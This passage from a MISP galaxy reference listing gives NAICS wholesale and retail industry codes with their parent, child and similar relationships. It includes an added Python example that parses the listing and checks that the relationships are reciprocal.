  • parent-of: misp-galaxy:naics="424480" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42449" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424490" with estimative-language:likelihood-probability="likely"

42441

General Line Grocery Merchant Wholesalers

The tag is: misp-galaxy:naics="42441"

42441 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424410" with estimative-language:likelihood-probability="likely"

424410

General Line Grocery Merchant Wholesalers

The tag is: misp-galaxy:naics="424410"

424410 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42441" with estimative-language:likelihood-probability="likely"

42442

Packaged Frozen Food Merchant Wholesalers

The tag is: misp-galaxy:naics="42442"

42442 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424420" with estimative-language:likelihood-probability="likely"

424420

Packaged Frozen Food Merchant Wholesalers

The tag is: misp-galaxy:naics="424420"

424420 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42442" with estimative-language:likelihood-probability="likely"

42443

Dairy Product (except Dried or Canned) Merchant Wholesalers

The tag is: misp-galaxy:naics="42443"

42443 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424430" with estimative-language:likelihood-probability="likely"

424430

Dairy Product (except Dried or Canned) Merchant Wholesalers

The tag is: misp-galaxy:naics="424430"

424430 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42443" with estimative-language:likelihood-probability="likely"

42444

Poultry and Poultry Product Merchant Wholesalers

The tag is: misp-galaxy:naics="42444"

42444 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424440" with estimative-language:likelihood-probability="likely"

424440

Poultry and Poultry Product Merchant Wholesalers

The tag is: misp-galaxy:naics="424440"

424440 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42444" with estimative-language:likelihood-probability="likely"

42445

Confectionery Merchant Wholesalers

The tag is: misp-galaxy:naics="42445"

42445 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424450" with estimative-language:likelihood-probability="likely"

424450

Confectionery Merchant Wholesalers

The tag is: misp-galaxy:naics="424450"

424450 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42445" with estimative-language:likelihood-probability="likely"

42446

Fish and Seafood Merchant Wholesalers

The tag is: misp-galaxy:naics="42446"

42446 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424460" with estimative-language:likelihood-probability="likely"

424460

Fish and Seafood Merchant Wholesalers

The tag is: misp-galaxy:naics="424460"

424460 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42446" with estimative-language:likelihood-probability="likely"

42447

Meat and Meat Product Merchant Wholesalers

The tag is: misp-galaxy:naics="42447"

42447 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424470" with estimative-language:likelihood-probability="likely"

424470

Meat and Meat Product Merchant Wholesalers

The tag is: misp-galaxy:naics="424470"

424470 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42447" with estimative-language:likelihood-probability="likely"

42448

Fresh Fruit and Vegetable Merchant Wholesalers

The tag is: misp-galaxy:naics="42448"

42448 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424480" with estimative-language:likelihood-probability="likely"

424480

Fresh Fruit and Vegetable Merchant Wholesalers

The tag is: misp-galaxy:naics="424480"

424480 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42448" with estimative-language:likelihood-probability="likely"

42449

Other Grocery and Related Products Merchant Wholesalers

The tag is: misp-galaxy:naics="42449"

42449 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424490" with estimative-language:likelihood-probability="likely"

424490

Other Grocery and Related Products Merchant Wholesalers

The tag is: misp-galaxy:naics="424490"

424490 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42449" with estimative-language:likelihood-probability="likely"

4245

Farm Product Raw Material Merchant Wholesalers

The tag is: misp-galaxy:naics="4245"

4245 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42451" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42452" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424520" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424590" with estimative-language:likelihood-probability="likely"

42451

Grain and Field Bean Merchant Wholesalers

The tag is: misp-galaxy:naics="42451"

42451 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424510" with estimative-language:likelihood-probability="likely"

424510

Grain and Field Bean Merchant Wholesalers

The tag is: misp-galaxy:naics="424510"

424510 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42451" with estimative-language:likelihood-probability="likely"

42452

Livestock Merchant Wholesalers

The tag is: misp-galaxy:naics="42452"

42452 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424520" with estimative-language:likelihood-probability="likely"

424520

Livestock Merchant Wholesalers

The tag is: misp-galaxy:naics="424520"

424520 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42452" with estimative-language:likelihood-probability="likely"

42459

Other Farm Product Raw Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42459"

42459 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424590" with estimative-language:likelihood-probability="likely"

424590

Other Farm Product Raw Material Merchant Wholesalers

The tag is: misp-galaxy:naics="424590"

424590 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42459" with estimative-language:likelihood-probability="likely"

4246

Chemical and Allied Products Merchant Wholesalers

The tag is: misp-galaxy:naics="4246"

4246 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42461" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424610" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42469" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424690" with estimative-language:likelihood-probability="likely"

42461

Plastics Materials and Basic Forms and Shapes Merchant Wholesalers

The tag is: misp-galaxy:naics="42461"

42461 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424610" with estimative-language:likelihood-probability="likely"

424610

Plastics Materials and Basic Forms and Shapes Merchant Wholesalers

The tag is: misp-galaxy:naics="424610"

424610 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42461" with estimative-language:likelihood-probability="likely"

42469

Other Chemical and Allied Products Merchant Wholesalers

The tag is: misp-galaxy:naics="42469"

42469 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424690" with estimative-language:likelihood-probability="likely"

424690

Other Chemical and Allied Products Merchant Wholesalers

The tag is: misp-galaxy:naics="424690"

424690 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42469" with estimative-language:likelihood-probability="likely"

4247

Petroleum and Petroleum Products Merchant Wholesalers

The tag is: misp-galaxy:naics="4247"

4247 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42471" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42472" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424720" with estimative-language:likelihood-probability="likely"

42471

Petroleum Bulk Stations and Terminals

The tag is: misp-galaxy:naics="42471"

42471 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424710" with estimative-language:likelihood-probability="likely"

424710

Petroleum Bulk Stations and Terminals

The tag is: misp-galaxy:naics="424710"

424710 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42471" with estimative-language:likelihood-probability="likely"

42472

Petroleum and Petroleum Products Merchant Wholesalers (except Bulk Stations and Terminals)

The tag is: misp-galaxy:naics="42472"

42472 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424720" with estimative-language:likelihood-probability="likely"

424720

Petroleum and Petroleum Products Merchant Wholesalers (except Bulk Stations and Terminals)

The tag is: misp-galaxy:naics="424720"

424720 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42472" with estimative-language:likelihood-probability="likely"

4248

Beer, Wine, and Distilled Alcoholic Beverage Merchant Wholesalers

The tag is: misp-galaxy:naics="4248"

4248 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42481" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424810" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42482" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424820" with estimative-language:likelihood-probability="likely"

42481

Beer and Ale Merchant Wholesalers

The tag is: misp-galaxy:naics="42481"

42481 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424810" with estimative-language:likelihood-probability="likely"

424810

Beer and Ale Merchant Wholesalers

The tag is: misp-galaxy:naics="424810"

424810 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42481" with estimative-language:likelihood-probability="likely"

42482

Wine and Distilled Alcoholic Beverage Merchant Wholesalers

The tag is: misp-galaxy:naics="42482"

42482 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424820" with estimative-language:likelihood-probability="likely"

424820

Wine and Distilled Alcoholic Beverage Merchant Wholesalers

The tag is: misp-galaxy:naics="424820"

424820 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42482" with estimative-language:likelihood-probability="likely"

4249

Miscellaneous Nondurable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="4249"

4249 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42493" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42494" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42495" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424950" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42499" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424990" with estimative-language:likelihood-probability="likely"

42491

Farm Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42491"

42491 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424910" with estimative-language:likelihood-probability="likely"

424910

Farm Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424910"

424910 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42491" with estimative-language:likelihood-probability="likely"

42492

Book, Periodical, and Newspaper Merchant Wholesalers

The tag is: misp-galaxy:naics="42492"

42492 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424920" with estimative-language:likelihood-probability="likely"

424920

Book, Periodical, and Newspaper Merchant Wholesalers

The tag is: misp-galaxy:naics="424920"

424920 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42492" with estimative-language:likelihood-probability="likely"

42493

Flower, Nursery Stock, and Florists' Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42493"

42493 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424930" with estimative-language:likelihood-probability="likely"

424930

Flower, Nursery Stock, and Florists' Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424930"

424930 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42493" with estimative-language:likelihood-probability="likely"

42494

Tobacco Product and Electronic Cigarette Merchant Wholesalers

The tag is: misp-galaxy:naics="42494"

42494 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424940" with estimative-language:likelihood-probability="likely"

424940

Tobacco Product and Electronic Cigarette Merchant Wholesalers

The tag is: misp-galaxy:naics="424940"

424940 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42494" with estimative-language:likelihood-probability="likely"

42495

Paint, Varnish, and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42495"

42495 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424950" with estimative-language:likelihood-probability="likely"

424950

Paint, Varnish, and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424950"

424950 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42495" with estimative-language:likelihood-probability="likely"

42499

Other Miscellaneous Nondurable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42499"

42499 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424990" with estimative-language:likelihood-probability="likely"

424990

Other Miscellaneous Nondurable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="424990"

424990 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42499" with estimative-language:likelihood-probability="likely"

425

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="425"

425 has relationships with:

  • child-of: misp-galaxy:naics="42" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4251" with estimative-language:likelihood-probability="likely"

4251

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="4251"

4251 has relationships with:

  • child-of: misp-galaxy:naics="425" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="425120" with estimative-language:likelihood-probability="likely"

42512

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="42512"

42512 has relationships with:

  • child-of: misp-galaxy:naics="4251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="425120" with estimative-language:likelihood-probability="likely"

425120

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="425120"

425120 has relationships with:

  • child-of: misp-galaxy:naics="4251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42512" with estimative-language:likelihood-probability="likely"
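
The listing above expresses each NAICS code as a cluster carrying child-of, parent-of and similar relationships to other codes, each qualified with an estimative-language likelihood. Before such a hierarchy is loaded into tooling that walks it (for example to roll a victim-sector tag up to its parent industry group), it is worth checking that the relationships are reciprocal. The following is an added example, not code from the MISP galaxy project: it parses a constructed excerpt in the page's own listing format (entries copied from the listing above, with the blank spacer lines dropped) and reports relationships whose target is absent from the excerpt, whose inverse is missing on the target, or whose child-of parent is not exactly one digit shorter. The regular expressions and the three finding categories are this example's own choices. Run against the excerpt, it shows that the page's relations are reciprocal and that 6-digit national-industry codes such as 424610 are attached directly to their 4-digit industry group, with the 5-digit code as a sibling via similar, rather than nested under the 5-digit code.

```python
"""Parse the MISP galaxy NAICS listing format shown on this page and check
that the cluster relationships are mutually consistent (added example)."""
import re

# Constructed sample: entries copied from the listing above (blank spacer
# lines dropped; the parser does not depend on them).
SAMPLE = """\
4246
Chemical and Allied Products Merchant Wholesalers
The tag is: misp-galaxy:naics="4246"
4246 has relationships with:
  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="42461" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="424610" with estimative-language:likelihood-probability="likely"
42461
Plastics Materials and Basic Forms and Shapes Merchant Wholesalers
The tag is: misp-galaxy:naics="42461"
42461 has relationships with:
  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="424610" with estimative-language:likelihood-probability="likely"
424610
Plastics Materials and Basic Forms and Shapes Merchant Wholesalers
The tag is: misp-galaxy:naics="424610"
424610 has relationships with:
  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="42461" with estimative-language:likelihood-probability="likely"
441222
Boat Dealers
The tag is: misp-galaxy:naics="441222"
441222 has relationships with:
  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"
"""

# Line shapes taken from the page; the patterns themselves are this example's.
TAG_RE = re.compile(r'^The tag is: misp-galaxy:naics="([^"]+)"$')
REL_RE = re.compile(
    r'^\s*•\s*(child-of|parent-of|similar):\s*misp-galaxy:naics="([^"]+)"'
    r'\s+with\s+estimative-language:likelihood-probability="([^"]+)"$'
)
INVERSE = {"child-of": "parent-of", "parent-of": "child-of", "similar": "similar"}


def parse_listing(text):
    """Return {code: {"name": str, "rels": [(type, target, likelihood), ...]}}."""
    lines = [ln.rstrip() for ln in text.splitlines()]
    clusters, current = {}, None
    for i, line in enumerate(lines):
        m = TAG_RE.match(line)
        if m:
            # The cluster name is the nearest non-empty line above the tag line.
            name = next(ln for ln in reversed(lines[:i]) if ln.strip())
            current = clusters.setdefault(m.group(1), {"name": name, "rels": []})
            continue
        m = REL_RE.match(line)
        if m and current is not None:
            current["rels"].append((m.group(1), m.group(2), m.group(3)))
    return clusters


def check_hierarchy(clusters):
    """Classify every relationship in a parsed listing.

    dangling   - the target code is not in the listing (expected for a subset)
    asymmetric - the target exists but does not carry the inverse relationship
    level      - a child-of whose parent code is not exactly one digit shorter
    """
    findings = {"dangling": [], "asymmetric": [], "level": []}
    for code, cluster in clusters.items():
        for rtype, target, _likelihood in cluster["rels"]:
            label = f"{code} {rtype} {target}"
            if target not in clusters:
                findings["dangling"].append(label)
                continue
            back = {(t, tgt) for t, tgt, _ in clusters[target]["rels"]}
            if (INVERSE[rtype], code) not in back:
                findings["asymmetric"].append(label)
            if rtype == "child-of" and len(target) != len(code) - 1:
                findings["level"].append(label)
    return {kind: sorted(items) for kind, items in findings.items()}


if __name__ == "__main__":
    for kind, items in check_hierarchy(parse_listing(SAMPLE)).items():
        print(kind, items)
```

The parser keys clusters by the value of the `misp-galaxy:naics` tag rather than by the heading line, so it also works on the full page text where blank lines separate entries. Dangling targets are reported separately because they are expected whenever only an excerpt is checked; asymmetric relations are the ones that would silently break a tree walk.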

44-45

Retail Trade

The tag is: misp-galaxy:naics="44-45"

441

Motor Vehicle and Parts Dealers

The tag is: misp-galaxy:naics="441"

441 has relationships with:

  • parent-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

4411

Automobile Dealers

The tag is: misp-galaxy:naics="4411"

4411 has relationships with:

  • child-of: misp-galaxy:naics="441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441120" with estimative-language:likelihood-probability="likely"

44111

New Car Dealers

The tag is: misp-galaxy:naics="44111"

44111 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441110" with estimative-language:likelihood-probability="likely"

441110

New Car Dealers

The tag is: misp-galaxy:naics="441110"

441110 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44111" with estimative-language:likelihood-probability="likely"

44112

Used Car Dealers

The tag is: misp-galaxy:naics="44112"

44112 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441120" with estimative-language:likelihood-probability="likely"

441120

Used Car Dealers

The tag is: misp-galaxy:naics="441120"

441120 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44112" with estimative-language:likelihood-probability="likely"

4412

Other Motor Vehicle Dealers

The tag is: misp-galaxy:naics="4412"

4412 has relationships with:

  • child-of: misp-galaxy:naics="441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441227" with estimative-language:likelihood-probability="likely"

44121

Recreational Vehicle Dealers

The tag is: misp-galaxy:naics="44121"

44121 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441210" with estimative-language:likelihood-probability="likely"

441210

Recreational Vehicle Dealers

The tag is: misp-galaxy:naics="441210"

441210 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44121" with estimative-language:likelihood-probability="likely"

44122

Motorcycle, Boat, and Other Motor Vehicle Dealers

The tag is: misp-galaxy:naics="44122"

44122 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

441222

Boat Dealers

The tag is: misp-galaxy:naics="441222"

441222 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

441227

Motorcycle, ATV, and All Other Motor Vehicle Dealers

The tag is: misp-galaxy:naics="441227"

441227 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

4413

Automotive Parts, Accessories, and Tire Retailers

The tag is: misp-galaxy:naics="4413"

4413 has relationships with:

  • child-of: misp-galaxy:naics="441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441340" with estimative-language:likelihood-probability="likely"

44133

Automotive Parts and Accessories Retailers

The tag is: misp-galaxy:naics="44133"

44133 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441330" with estimative-language:likelihood-probability="likely"

441330

Automotive Parts and Accessories Retailers

The tag is: misp-galaxy:naics="441330"

441330 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44133" with estimative-language:likelihood-probability="likely"

44134

Tire Dealers

The tag is: misp-galaxy:naics="44134"

44134 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441340" with estimative-language:likelihood-probability="likely"

441340

Tire Dealers

The tag is: misp-galaxy:naics="441340"

441340 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44134" with estimative-language:likelihood-probability="likely"

444

Building Material and Garden Equipment and Supplies Dealers

The tag is: misp-galaxy:naics="444"

444 has relationships with:

  • parent-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

4441

Building Material and Supplies Dealers

The tag is: misp-galaxy:naics="4441"

4441 has relationships with:

  • child-of: misp-galaxy:naics="444" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44418" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444180" with estimative-language:likelihood-probability="likely"

44411

Home Centers

The tag is: misp-galaxy:naics="44411"

44411 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444110" with estimative-language:likelihood-probability="likely"

444110

Home Centers

The tag is: misp-galaxy:naics="444110"

444110 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44411" with estimative-language:likelihood-probability="likely"

44412

Paint and Wallpaper Retailers

The tag is: misp-galaxy:naics="44412"

44412 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444120" with estimative-language:likelihood-probability="likely"

444120

Paint and Wallpaper Retailers

The tag is: misp-galaxy:naics="444120"

444120 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44412" with estimative-language:likelihood-probability="likely"

44414

Hardware Retailers

The tag is: misp-galaxy:naics="44414"

44414 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444140" with estimative-language:likelihood-probability="likely"

444140

Hardware Retailers

The tag is: misp-galaxy:naics="444140"

444140 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44414" with estimative-language:likelihood-probability="likely"

44418

Other Building Material Dealers

The tag is: misp-galaxy:naics="44418"

44418 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444180" with estimative-language:likelihood-probability="likely"

444180

Other Building Material Dealers

The tag is: misp-galaxy:naics="444180"

444180 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44418" with estimative-language:likelihood-probability="likely"

4442

Lawn and Garden Equipment and Supplies Retailers

The tag is: misp-galaxy:naics="4442"

4442 has relationships with:

  • child-of: misp-galaxy:naics="444" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444240" with estimative-language:likelihood-probability="likely"

44423

Outdoor Power Equipment Retailers

The tag is: misp-galaxy:naics="44423"

44423 has relationships with:

